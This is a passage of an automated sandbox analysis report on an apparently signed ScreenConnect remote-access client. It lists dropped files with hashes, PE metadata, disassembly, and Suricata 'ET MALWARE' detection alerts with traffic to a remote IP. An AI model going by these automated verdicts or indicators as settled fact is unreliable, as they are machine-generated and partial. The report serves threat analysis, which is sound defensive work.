Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsClient.exe.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
Category:	dropped
Size (bytes):	17866
Entropy (8bit):	5.954687824833028
Encrypted:	false
SSDEEP:	384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
MD5:	1DC9DD74A43D10C5F1EAE50D76856F36
SHA1:	E4080B055DD3A290DB546B90BCF6C5593FF34F6D
SHA-256:	291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
SHA-512:	91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.862223562830496
Encrypted:	false
SSDEEP:	1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
MD5:	B1799A5A5C0F64E9D61EE4BA465AFE75
SHA1:	7785DA04E98E77FEC7C9E36B8C68864449724D71
SHA-256:	7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
SHA-512:	AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\NXHJ1YAX.JAG\Q391L3A8.JRQ.application

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:	dropped
Size (bytes):	147976
Entropy (8bit):	5.699150757460175
Encrypted:	false
SSDEEP:	3072:0aNYcT51/FXvMVNWfCXq9ymdrpErpErpXm2o9HuzhJOvP:0dcfiVITrpErpErpXmt8vOvP
MD5:	B7DEB98212080D0214AD779A9446FF09
SHA1:	05FAD5E8F0131FB5DD9D6EFA8F879E8FA684B569
SHA-256:	C8DC03F64AA8D794D5A763B4260C18967267B7E9C55E1BE8D0ECCF5107C9D49A
SHA-512:	7F93A5DF3A29312518CE188DBD72B987FD5B99DB58C4E8ACC7FF9677907B1B74F2126A6D4FD1DEF4FE136649D5690EB3EBFE739D57299C0A6E4E5EA7DB1C74E2
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	87
Entropy (8bit):	3.463057265798253
Encrypted:	false
SSDEEP:	3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
MD5:	D2DED43CE07BFCE4D1C101DFCAA178C8
SHA1:	CE928A1293EA2ACA1AC01B61A344857786AFE509
SHA-256:	8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
SHA-512:	A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
Malicious:	false
Preview:	......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465455139169928
Encrypted:	false
SSDEEP:	6144:jIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbJ:0XD94+WlLZMM6YFHp+J
MD5:	89729BAE50765CEDB4ABFBED0C74C8F1
SHA1:	67E13323DE02DF0C22B53015FB35711E8C1BDD5B
SHA-256:	1D74DE6AC9591822F27714F6BF5DB4D0C4DD6EB9A11F5B1EF6100DF13CBA222C
SHA-512:	2BF6A36D23A618532DDDCD52DFEB2F1ABF0F94F58420F5C8B6450126909C917F2BEF17BFAAC57177E62DC50ACF9A15B31106B10BA569F780F9D442D30C478948
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"{d.................................................................................................................................................................................................................................................................................................................................................5.s.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.515670193804384
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	support.Client.exe
File size:	83'320 bytes
MD5:	7989214071f7728a9a0d54c29d62d88d
SHA1:	1a2bb3baa708bb8f895adcf5538d166f754a2913
SHA256:	0ff7d27cd6b6a2822b73878995902d9bfa2fe3db623547a9c1ec40e11bda284e
SHA512:	0dc24d099e602a0c64f65c1d98f258e7e99fdd26d387acc8c8f78bf6adb28a584f8c6e4783ae136f1510bbf6996fa6d83ff45481891cbf1173be5db44bd583c2
SSDEEP:	1536:hoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYH7oxD:benkyfPAwiMq0RqRfbaxZJYYH
TLSH:	22835B43B5D18875E9720E3118B1D9B4593FBE110EA48EAB3398426E0F351D19E3AE7B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............\|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x401489
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	37d5c89163970dd3cc69230538a1b72b

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	17/08/2022 01:00:00 16/08/2025 00:59:59
Subject Chain	CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version:	3
Thumbprint MD5:	AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1:	4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256:	82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial:	0B9360051BCCF66642998998D5BA97CE

Entrypoint Preview

Instruction
call 00007FF19070B7AAh
jmp 00007FF19070B25Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040B048h]
push dword ptr [ebp+08h]
call dword ptr [0040B044h]
push C0000409h
call dword ptr [0040B04Ch]
push eax
call dword ptr [0040B050h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040B054h]
test eax, eax
je 00007FF19070B3E7h
push 00000002h
pop ecx
int 29h
mov dword ptr [004118C0h], eax
mov dword ptr [004118BCh], ecx
mov dword ptr [004118B8h], edx
mov dword ptr [004118B4h], ebx
mov dword ptr [004118B0h], esi
mov dword ptr [004118ACh], edi
mov word ptr [004118D8h], ss
mov word ptr [004118CCh], cs
mov word ptr [004118A8h], ds
mov word ptr [004118A4h], es
mov word ptr [004118A0h], fs
mov word ptr [0041189Ch], gs
pushfd
pop dword ptr [004118D0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004118C4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004118C8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004118D4h], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00411810h], 00010001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1060c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x11800	0x2d78
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14000	0xddc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xfe38	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xfd78	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9cf8	0x9e00	bae4521030709e187bdbe8a34d7bf731	False	0.6035650712025317	data	6.581464957368758	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x5d58	0x5e00	ec94ce6ebdbe57640638e0aa31d08896	False	0.4178025265957447	Applesoft BASIC program data, first line number 1	4.843224204192078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x11cc	0x800	04a548a5c04675d08166d3823a6bf61b	False	0.16357421875	data	2.0120795802951505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x13000	0x1e0	0x200	aa256780346be2e1ee49ac6d69d2faff	False	0.52734375	data	4.703723272345726	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x14000	0xddc	0xe00	908329e10a1923a3c4938a10d44237d9	False	0.7776227678571429	data	6.495696626464028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x13060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW

CRYPT32.dll

CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-05T01:03:10.125267+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	31.42.187.211	443	192.168.2.4	49742	TCP
2024-10-05T01:03:11.477025+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	31.42.187.211	443	192.168.2.4	49744	TCP
2024-10-05T01:03:16.020355+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	31.42.187.211	443	192.168.2.4	49750	TCP
2024-10-05T01:03:17.484003+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	31.42.187.211	443	192.168.2.4	49751	TCP
2024-10-05T01:03:19.073804+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	31.42.187.211	443	192.168.2.4	49752	TCP
2024-10-05T01:03:20.339560+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	31.42.187.211	443	192.168.2.4	49753	TCP
2024-10-05T01:03:23.023404+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	31.42.187.211	443	192.168.2.4	49754	TCP
2024-10-05T01:03:24.868329+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	31.42.187.211	443	192.168.2.4	49755	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 5, 2024 01:02:59.167948961 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:02:59.168044090 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:02:59.168169975 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:02:59.208022118 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:02:59.208062887 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:02:59.914243937 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:02:59.914361954 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:02:59.923321009 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:02:59.923367023 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:02:59.924264908 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:02:59.977979898 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:00.506632090 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:00.547430038 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.110466957 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.110538960 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.110558987 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.110577106 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.110618114 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.110640049 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.110636950 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.110636950 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.110636950 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.110704899 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.110750914 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.110750914 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.110776901 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.144053936 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.144129038 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.144151926 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.144171953 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.144205093 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.148303032 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.148359060 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.148380041 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.148401022 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.148447037 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.196751118 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.268490076 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.268538952 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.268758059 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.268776894 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.268883944 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.272855043 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.272898912 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.272936106 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.272947073 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.272977114 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.273003101 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.276345015 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.276386976 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.276475906 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.276488066 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.276588917 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.383301020 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.383332014 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.383804083 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.383866072 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.384177923 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.386986971 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.387011051 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.387181044 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.387249947 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.387294054 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.387320042 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.390224934 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.390245914 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.390299082 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.390317917 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.390341043 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.390393019 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.390404940 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.390424013 CEST	443	49731	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.390474081 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.394741058 CEST	49731	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.736670971 CEST	49734	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.736716032 CEST	443	49734	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:01.736800909 CEST	49734	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.737016916 CEST	49734	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:01.737030029 CEST	443	49734	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:02.471513033 CEST	443	49734	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:02.474627018 CEST	49734	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:02.474678993 CEST	443	49734	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:02.823465109 CEST	443	49734	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:02.823532104 CEST	443	49734	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:02.823579073 CEST	443	49734	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:02.823610067 CEST	49734	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:02.823636055 CEST	443	49734	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:02.823657990 CEST	49734	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:02.823683977 CEST	49734	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:03.323875904 CEST	443	49734	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:03.324059010 CEST	443	49734	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:03.324285030 CEST	49734	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:03.324285030 CEST	49734	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:03.324671030 CEST	49734	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:08.849226952 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:08.849323988 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:08.849416971 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:08.849594116 CEST	49742	443	192.168.2.4	31.42.187.211
